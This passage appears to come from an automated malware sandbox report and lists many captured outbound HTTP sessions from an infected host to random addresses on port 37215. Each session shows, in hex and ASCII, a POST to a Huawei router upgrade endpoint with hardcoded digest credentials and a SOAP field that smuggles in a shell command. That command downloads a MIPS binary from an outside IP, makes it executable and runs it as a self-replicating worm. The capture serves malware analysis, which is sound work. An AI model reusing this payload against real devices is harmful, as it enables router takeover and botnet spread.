2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1875192.168.2.1546774197.242.149.10237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.998960018 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1876192.168.2.1551218197.121.18.21537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.999017000 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1877192.168.2.1558970119.148.14.20437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.999088049 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1878192.168.2.154452441.243.21.11737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.030277967 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1879192.168.2.1541358197.131.85.15437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.035305977 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1880192.168.2.1534528157.160.158.1837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.962393045 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1881192.168.2.155565472.15.150.14937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.994697094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1882192.168.2.1545024197.0.61.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.994703054 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1883192.168.2.1547820124.32.254.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.994723082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1884192.168.2.1535660197.166.116.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.994775057 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1885192.168.2.153951441.172.40.20537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:16.994776011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
